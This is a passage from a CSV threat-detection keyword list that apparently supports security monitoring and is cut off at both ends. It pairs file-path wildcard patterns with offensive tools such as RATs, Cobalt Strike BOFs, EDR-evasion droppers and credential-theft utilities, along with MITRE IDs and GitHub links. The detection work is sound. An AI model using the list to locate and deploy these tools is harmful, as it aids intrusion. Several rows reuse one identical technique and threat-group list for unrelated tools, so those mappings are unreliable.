tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/redis-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/redpeanut.cer*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/RedPeanut.git*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/RedPeanut.html*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/RedPeanutAgent/*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/RedPeanutRP/*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - 
TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*/RedPersist.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,1,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z
-*/RedPersist.git*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,1,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z
-*/redsocks.sh*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z
-*/redsocks-fw.sh*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z
-*/RedTeam_toolkit*,offensive_tool_keyword,RedTeam_toolkit,Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signorrayan/RedTeam_toolkit,1,1,N/A,N/A,5,499,114,2023-09-27T04:40:54Z,2021-08-18T08:58:14Z
-*/red-team-scripts*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,1,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*/RedWarden.git*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*/ReferenceSourceLibraries/Sharpire*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - 
T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/ReflectiveDll.c*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/ReflectiveDLLInjection/*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/ReflectiveLoader.c*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z 
-*/ReflectiveNtdll.git*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,1,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z
-*/RefleXXion.git*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z
-*/reGeorg.git*,offensive_tool_keyword,reGeorg,The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.,T1090 - T1095 - T1572,TA0002 - TA0007 - ,N/A,N/A,Data Exfiltration,https://github.com/sensepost/reGeorg,1,1,N/A,N/A,10,2828,844,2020-11-04T10:36:24Z,2014-08-08T00:58:12Z -*/RegistryPersistence.c*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*/Registry-Recon/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Registry-Recon,1,1,N/A,10,10,314,36,2022-06-06T14:39:12Z,2021-07-29T18:47:23Z -*/regreeper.jpg*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*/Reg-Restore-Persistence-Mole*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*/regsvcs/meterpreter*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z
-*/regsvr.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z
-*/regsvr32/shellcode_inject*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z
-*/releases/download/*/abc.exe*,offensive_tool_keyword,TGSThief,get the TGS of a user whose logon session is just present on the computer,T1558 - T1558.003 - T1078 - T1078.005,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/MzHmO/TGSThief,1,1,N/A,9,2,129,18,2023-07-25T05:30:39Z,2023-07-23T07:47:05Z
-*/releases/latest/download/lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z
-*/Remote/adcs_request/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/office_tokens/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/procdump/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/ProcessDestroy/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/ProcessListHandles/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 
- T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/schtaskscreate/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/Remote/schtasksrun/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - 